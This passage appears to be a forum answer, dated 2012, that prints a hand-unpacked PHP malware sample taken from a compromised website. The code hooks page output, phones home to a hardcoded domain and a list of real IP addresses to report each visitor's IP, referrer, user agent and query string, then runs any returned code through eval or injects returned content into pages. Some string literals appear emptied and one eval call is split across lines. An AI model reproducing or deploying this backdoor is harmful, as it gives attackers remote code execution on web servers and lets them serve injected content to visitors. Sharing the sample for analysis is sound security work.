        str_ireplace("","",$buf,$cnt_h);

        if ($cnt_h == 1) {
            $buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf); 
            return $buf;
        }

        str_ireplace("","",$buf,$cnt_h);
        if ($cnt_h == 1) {
            $buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf);
            return $buf;
        }

        return $buf;
    }

    function opanki($buf){
        $gz_e = false;$h_l = headers_list();

        if (in_array("Content-Encoding: gzip", $h_l)) {
            $gz_e = true;
        }

        if ($gz_e){
            $tmpfname = tempnam("/tmp", "FOO");
            file_put_contents($tmpfname, $buf);
            $zd = gzopen($tmpfname, "r");
            $contents = gzread($zd, 10000000);
            $contents = mod_con($contents);
            gzclose($zd);
            unlink($tmpfname);
            $contents = gzencode($contents);
        } 

        else {
            $contents = mod_con($buf);
        }

        $len = strlen($contents);
        header("Content-Length: ".$len);
        return($contents);
    } 

    function GetMama(){
        $mother = "mdrmediagroup.com";
        return $mother;
    }

    ob_start("opanki");

    function ahfudflfzdhfhs($pa){
        $mama = GetMama();
        $file = urlencode(FILE);

        if (isset($_SERVER["HTTP_HOST"])){
            $host = $_SERVER["HTTP_HOST"];
        } else {
            $host = "";
        }

        if (isset($_SERVER["REMOTE_ADDR"])){
            $ip = $_SERVER["REMOTE_ADDR"];
        } 

        else {
            $ip = "";
        }

        if (isset($_SERVER["HTTP_REFERER"])){
            $ref = urlencode($_SERVER["HTTP_REFERER"]);
        } 

        else {
            $ref = "";
        }

        if (isset($_SERVER["HTTP_USER_AGENT"])){
            $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
        } 

        else {
            $ua = "";
        }

        if (isset($_SERVER["QUERY_STRING"])){
            $qs = urlencode($_SERVER["QUERY_STRING"]);
        } 

        else {
            $qs = "";
        }

        $url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;

        $try = true;

        if( function_exists("curl_init") ){

            $ch = curl_init($url_0 . $url_1);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_TIMEOUT, 3);
            $ult = trim(curl_exec($ch));
            $try = false;
        } 

        if ((ini_get("allow_url_fopen")) && $try) {
            $ult = trim(@file_get_contents($url_0 . $url_1));
            $try = false;
        }

        if($try){
            $fp = fsockopen($pa, 80, $errno, $errstr, 30);

            if ($fp) {
                $out = "GET $url_1 HTTP/1.0\r\n";
                $out .= "Host: $pa\r\n";
                $out .= "Connection: Close\r\n\r\n";
                fwrite($fp, $out);
                $ret = "";

                while (!feof($fp)) {
                    $ret .= fgets($fp, 128);
                }

                fclose($fp);

                $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
            }

        } 

        if (strpos($ult,"eval") !== false){
            $z = stripslashes(str_replace("eval","",$ult)); e
            val($z); 
            exit();
        }

        if (strpos($ult,"ebna") !== false){
            $_SERVER["good"] = str_replace("ebna","",$ult);
            return true;
        }

        else {
            return false;
        }

    }

    $father2[] = "77.81.241.253";
    $father2[] = "46.249.58.135";
    $father2[] = "176.9.241.150";
    $father2[] = "46.37.169.56";
    $father2[] = "94.242.255.35";
    $father2[] = "178.162.129.223";
    $father2[] = "31.184.234.96";
    $father2[] = "77.95.18.189";
    $father2[] = "93.170.137.22";
    $father2[] = "188.40.95.244";
    $father2[] = "199.115.231.58";
    $father2[] = "82.192.87.178";
    $father2[] = "216.246.99.215";
    $father2[] = "95.211.18.79";

    shuffle($father2);

    foreach($father2 as $ur){
        if ( ahfudflfzdhfhs($ur) ) {
            break ;
        }
    }
}

手工拆包,因此更具可读性:)

于 2012-04-18T21:17:04.193 回答